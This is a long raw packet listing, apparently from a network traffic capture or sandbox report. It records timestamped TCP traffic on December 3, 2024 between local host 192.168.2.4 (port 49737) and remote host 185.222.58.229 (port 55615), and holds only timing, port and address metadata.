Dec 3, 2024 13:27:13.991983891 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.992023945 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.992033005 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.992104053 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.992147923 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.992170095 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.992178917 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.992214918 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.992261887 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.992281914 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.992402077 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.992409945 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.992434978 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.992459059 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.992568016 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.992577076 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.992619038 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.992631912 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.992650032 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.992670059 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.992691040 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.992705107 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.992713928 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.992755890 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.992793083 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.992824078 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.992867947 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.992914915 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.992924929 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.992958069 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.992974043 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.992990971 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.993032932 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.993117094 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.993127108 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.993165970 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.993196011 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.993206024 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.993242025 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.993279934 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.993299007 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.993308067 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.993345022 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.993362904 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.993372917 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.993406057 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.993499041 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.993508101 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.993525982 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.993531942 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.993535042 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.993556976 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.993561029 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.993576050 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.993592024 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.993602037 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.993624926 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.993726015 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.993767977 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.993802071 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.993817091 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.993833065 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.993834972 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.993875980 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.993954897 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.993966103 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994012117 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.994050026 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994057894 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994066000 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994074106 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994076967 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994091034 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.994091988 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994102001 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994110107 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994117975 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994122028 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.994148970 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.994164944 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.994235039 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994244099 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994251013 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994257927 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994266033 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994283915 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.994304895 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.994313955 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.994360924 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994369984 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994379044 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994386911 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994415045 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.994437933 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.994452953 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994465113 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994474888 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994484901 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994492054 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994505882 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.994518995 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.994528055 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994538069 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.994565964 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994570971 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.994695902 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994710922 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994745970 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.994757891 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994769096 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.994818926 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:13.994957924 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:13.997776031 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.062419891 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.062453985 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.062482119 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.062510014 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.062669992 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.062717915 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.062803984 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.062892914 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.109268904 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.109282017 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.109291077 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.109302998 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.109321117 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.109338045 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.109359026 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.109380960 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.109384060 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.109419107 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.109463930 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.109472990 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.109503031 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.109549999 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.109589100 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.109630108 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.109643936 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.109658957 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.109664917 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.109836102 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.109905005 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.109915972 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.109925032 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.109966040 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.109998941 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.110034943 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.110080957 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.110121012 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.110169888 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.110315084 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.110323906 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.110337973 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.110346079 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.110394001 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.110434055 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.110444069 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.110469103 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.110481024 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.110542059 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.110551119 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.110589027 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.110605001 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.110637903 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.110641003 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.110672951 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.110682964 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.110692978 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.110758066 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.110773087 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.110790968 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.110867023 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.110878944 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.110886097 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.110910892 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.110927105 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.111006975 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.111016989 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.111066103 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.111103058 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.111112118 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.111145020 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.111232042 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.111239910 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.111268044 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.111290932 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.111396074 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.111406088 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.111553907 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.111592054 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.111601114 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.111635923 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.111690998 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.111700058 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.111752033 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.111772060 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.111812115 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.111871958 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.111942053 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.111958981 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.112008095 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.112030029 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.112039089 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.112075090 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.112104893 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.112138987 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.112144947 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.112179995 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.112226963 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.112236023 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.112334967 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.112344027 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.112360954 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.112369061 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.112391949 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.112397909 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.112428904 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.112430096 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.112509012 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.112555027 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.112607956 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.112657070 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.112672091 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.112693071 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.112772942 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.112793922 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.112823963 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.112871885 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.112875938 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.112914085 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.112916946 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.113013029 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.113017082 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.113030910 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.113056898 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.113070965 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.113074064 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.113096952 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.113110065 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.113133907 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.113231897 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.113243103 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.113290071 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.113308907 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.113317966 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.113353968 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.113419056 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.113426924 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.113462925 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.113507986 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.113517046 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.113552094 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.113646984 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.113663912 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.113806963 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.113857031 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.113864899 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.113898993 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.113987923 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.114023924 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.114063025 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.114098072 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.114106894 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.114156008 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.114171028 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.114200115 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.114214897 CET	49737	55615	192.168.2.4	185.222.58.229
Dec 3, 2024 13:27:14.114293098 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.114301920 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.114347935 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.114587069 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.114595890 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.114598989 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.114696980 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.114705086 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.114712954 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.114773989 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.114867926 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.114912987 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.114979982 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.114989042 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.115005970 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.115039110 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.115122080 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.115147114 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.115252972 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.115261078 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.115299940 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.115308046 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.115425110 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.115432978 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.115459919 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.115525961 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.115559101 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.115566969 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.115597010 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.115662098 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.115777016 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.115796089 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.115838051 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.115876913 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.115920067 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.115927935 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.115962029 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.115969896 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.115995884 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.116054058 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.116089106 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.116106033 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.116204977 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.116213083 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.116245031 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.116276026 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.116360903 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.116410017 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.116451979 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.116487980 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.116549969 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.116580963 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.116655111 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.116662979 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.116702080 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.116709948 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.116770983 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.116780043 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.116930008 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.116938114 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.116950989 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.116959095 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.116971016 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.116977930 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.117022038 CET	55615	49737	185.222.58.229	192.168.2.4
Dec 3, 2024 13:27:14.117031097 CET	55615	49737	185.222.58.229	192.168.2.4
